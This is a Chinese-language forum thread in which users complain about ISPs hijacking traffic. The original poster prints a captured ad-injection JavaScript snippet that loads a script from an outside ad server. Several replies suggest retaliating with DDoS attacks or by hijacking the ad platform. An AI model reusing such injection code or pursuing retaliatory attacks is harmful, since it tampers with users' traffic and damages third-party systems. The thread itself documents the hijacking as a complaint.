现在流量劫持这么猖獗,貌似国家也没有管的意思,有曝光或者办法治治这种问题么?

2017-11-16 23:25:13 +08:00
 thetast
我自己用电信宽带、移动宽带、移动 4G 都出现了不同程度的流量劫持,而且现在只劫持手机,基本不劫持电脑。这让这种问题很头疼。
至少今天深圳电信被我抓到了劫持 JS 的访问。专门用手机通过 Fiddler 来访问 HTTP 网站,果然抓到:

源地址: http://ptf.flyert.com/template/zhikai_n5app/js/swipe.js?cHVzaA=102811

请求结果:

var _atn_obj_ = new Object;
_atn_obj_.oldurl = 'http://ptf.flyert.com/template/zhikai_n5app/js/swipe.js?cHVzaA=102811';
_atn_obj_.unified_url = 'http://ntx.quanliyouxi.cn:2525/adv_select/ad_unified_access?SP=ABzs/PzoPOz83Lg7yXnpGRmpOgmJugy8vPzM/Pg86Dy8vPzM/Pg8/IysrPycjLz8fNz7/OyczRmJuDzs7J0c3L0cnL0c7LzYPOg87PzcfOzoPPg8+DiIiI0ZmThpqNi5qe0ZyQkoPOys7Px8vMzszJg82DzM/Pzw==';
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);

多个 JS 都出现了类似的现象。有了证据,而且对方也是流氓(投诉多次,发现根本没用),有没有什么流氓的办法治呢?
9008 次点击
所在节点    宽带症候群
34 条回复
matolv
2017-11-16 23:37:21 +08:00
流量劫持=GDP UP,曝光并没什么暖用,工信部表示规范市场全靠自觉,国家没有相关法律制裁此等行为。流氓办法就是 DDOS 直接打死
pisser
2017-11-16 23:39:31 +08:00
无解,取证困难,利益链深。
changwei
2017-11-16 23:41:11 +08:00
可以法庭起诉一波,估计能带来很大影响,,但是不知道有什么法律支持。
yexm0
2017-11-16 23:43:03 +08:00
没有,而且深圳电信算是仁慈的了,深圳联通和移动连那些有名的 dns 地址也给你劫持掉的
thetast
2017-11-16 23:43:41 +08:00
@changwei 的确是有判例,但是取证方面的确很困难。

@pisser 这的确是很痛苦的事情,VPN 可以治这个行为的又被禁用,所有加密行为均被禁止。

@matolv 所以这个工信部和通讯管理局也是没办法?的确考虑过 DDoS

今天在移动 4G 下发现流量直接劫持 302 到了 10.0.2.111
thetast
2017-11-16 23:44:29 +08:00
@yexm0 没错,移动还劫持了 DNS 地址。这个是很恶心的,NX DOMAIN 也是回来他们自己的页面。这的确很恶心。
f2f2f
2017-11-16 23:47:37 +08:00
提速降费
羊毛出在羊身上
thetast
2017-11-16 23:53:23 +08:00
@f2f2f 提速? 200M 宽带上行 4M,降费?深圳电信的宽带貌似大多数时候都是要接近 2000 一年,一个月 160+。看看对面香港,再对面台湾,貌似这不是理由。
感觉电信自己都不是很清楚这回事,要不就是有些人装傻了。
qwvy2g
2017-11-17 00:12:53 +08:00
其实一直在想一个问题:以前看过有人用公司的网络挂挖币的设备,不知道运营商的家用宽带接入机房是怎么管理的?能否杜绝这种现象?
phy25
2017-11-17 00:35:46 +08:00
这东西就像个人信息泄露一样,反正问题没大到危害国家安全生命安全,就慢慢来。
据说现在在准备运营商级别的「反劫持系统」检测劫持了。
thetast
2017-11-17 01:00:36 +08:00
@qwvy2g 这个应该性质不同。
使用公司的网络挂挖币,如果公司是不允许这么做的,那么就应该算违反了公司使用网络的规定。
而对于家用宽带流量劫持,由于运营商提供的是家用宽带,网络服务,在中间加了流量劫持,那么就算是对网络链路中的内容进行了探测和更改。
GooMS
2017-11-17 03:45:34 +08:00
今年 18 大不就出了劫持的政策
LuvF
2017-11-17 08:43:16 +08:00
工信部
liyvhg
2017-11-17 08:59:29 +08:00
劫持那个广告平台,重定向到轮子的网站,然后举报
LanFomalhaut
2017-11-17 09:41:45 +08:00
每次看到这种话题 只想说 以暴制暴才是正道...什么投诉都是扯皮 临时几天白名单 又有何用..浪费时间精力 还影响心情: )
f2f2f
2017-11-17 09:48:56 +08:00
@f2f2f 那为啥当年 2000 一年 2M 就没听过劫持这种事呢?
人家 ISP 从来就没想真给你省钱
miaomiao888
2017-11-17 10:56:06 +08:00
所以我现在 10M 对等 有公网没各种劫持 懒的升不敢升 宽带商提示升级的电话也懒的接
580a388da131
2017-11-17 11:05:41 +08:00
没出什么幺蛾子,这种事情优先级不高,所以以后解决。
sasalemma
2017-11-17 11:09:42 +08:00
大内网特色。另 301 劫持也是正常,下载 cdn 加速都加速到自家的服务节点,对于强迫症来说,我就是要 idm 从原网站拖软件,只能在夜深人静的时候,还有 https 伺候。人一多,出国端口带宽不够就可以大内网加速,很忧伤,都不知道那些文件是不是造假的。没有数字签名也没有 sha1 对照的很忧伤。
anheiyouxia
2017-11-17 11:12:01 +08:00
@liyvhg 那到时候抓的就是你了😂
可以参考 2014 年温州有线电视被黑事件

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/407073

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX